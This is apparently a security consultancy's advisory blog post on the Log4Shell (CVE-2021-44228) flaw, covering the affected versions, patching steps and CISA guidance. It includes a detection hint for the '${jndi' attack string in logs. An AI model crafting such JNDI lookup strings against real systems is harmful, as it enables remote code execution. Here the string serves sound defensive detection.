A new remote code exploitation (RCE) vulnerability (CVE-2021-44228 / CVSS score 10.0) dubbed LogJam/Log4Shell hit the internet on Friday December 10th, 2021 that has security individuals extremely concerned, and for good reason.
The vulnerable code is part of the Apache logging framework, which is an open source framework used by developers for logging purposes. The source of the vulnerability, Log4j, is a java library within the framework and is used to collect activity. Recent reports indicate the exploit may have started as early as December 1st, but there was no evidence of mass exploitation until the vulnerability went public.
The vulnerability first gained notoriety through Microsofts’ Minecraft (the java-based client edition) where individuals were able to run malicious command through the in-game chat function. Since then, the vulnerability has spread to all corners of the internet, including Steam, iCloud and various hardware-based and software-based applications.
As this vulnerability allows for RCE, the patches should be applied as soon as possible. A threat actor can take advantage of this vulnerability by simply sending java code to the device if it contains Log4j libraries. By crafting commands so that systems execute malicious code as they are logged by the Log4j libraries, they can potentially gain unauthorized remote control of these devices.
As this java library is commonly utilized for logging purposes, any application which utilizes the library (versions 2.0 to 2.14.1) is vulnerable to the RCE. If the service of the logging is externally facing, this only compounds on the problem. The vulnerability is fixed in the latest version (2.15), however this isn’t as easy of a fix for end users as it may initially seem.
As the vulnerability stems from software built into the hardware and application-based software, an end-user IT department can only update the library if they own and manage the source code of the device/software. If the IT department does not manage it, they must wait for the vendor to release a patch or cease using the device/software.
For most organizations, the company must first:
- Ensure they are aware of all of their software (hardware and application-based software) in use
- Analyze those software pieces for potential vulnerable Log4j libraries
- Monitor the vendor’s patch releases for an update patch (if the software is vulnerable)
- Upon release of the update, apply emergency patches following your organizations emergency patch process.
A security researcher (SwitHak) created a GitHub repository of links to all major company announcements as it relates to Log4J. Using this repository, an IT team can quickly search through the vendors listed for the vendors disclosures as it relates to Log4j, to determine if the software is vulnerable and if so, if a patch has been released. The repository is available at https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592.
Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly released the following statement concerning the vulnerability early Saturday morning.
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library. This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use. End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”
CISA recommends asset owners take three immediate steps as soon as possible:
- Enumerate any external facing devices that have Log4j installed.
- Make sure that your security operations center is actioning every single alert on the devices that fall into the category above.
- Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts.
The Schneider Downs cybersecurity team recommends starting this repository to check if any of your software is vulnerable and to act accordingly.
If there is additional software in your organization that is not linked within this repository, we recommend checking with the vendor or analyzing the software to determine if it is potentially vulnerable, while focusing on any software or hardware that is externally facing first, and then moving inward in the environment.
Fortunately, detecting indicators of compromise can easily be done by looking for specific strings within the log files for Log4j. A quick check would be to search for any user-agent containing “${jndi” in the URL field with a 200 HTTP status code. For further detection, you can use these commands and rules to suit your needs.
This article is a continuation of our Apache Log4j Vulnerability series, available at /our-thoughts-on/category/cybersecurity. We encourage you to share our article with your network and reach out with any questions at [email protected].
Apache Log4j CISA Resources
- CISA Apache Log4j Vulnerability Guidance
- CISA Log4j (CVE-2021-44228) Vulnerability Guidance Github Repository
Apache Log4j Web Resources
- Apache – Log4j Security Vulnerability Center
- GitHub – BlueTeam CheatSheet * Log4Shell*
- Github – Log4j RCE Exploitation Detection
Related Articles
- Apache Log4j Vulnerability Update – Government Responses and Ransomware Activity
- Apache Log4j Vulnerability Update – CISA Issues Emergency Directive
- Apache Log4j Vulnerability Update – Remediation Tools and Patches
About Schneider Downs Cybersecurity
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].
In addition, our Digital Forensics and Incident Response teams are available 24x7x365 at 1-800-993-8937 if you suspect or are experiencing a network incident of any kind.
Want to be in the know? Subscribe to our bi-weekly newsletter, Focus on Cybersecurity, at www.schneiderdowns.com/subscribe.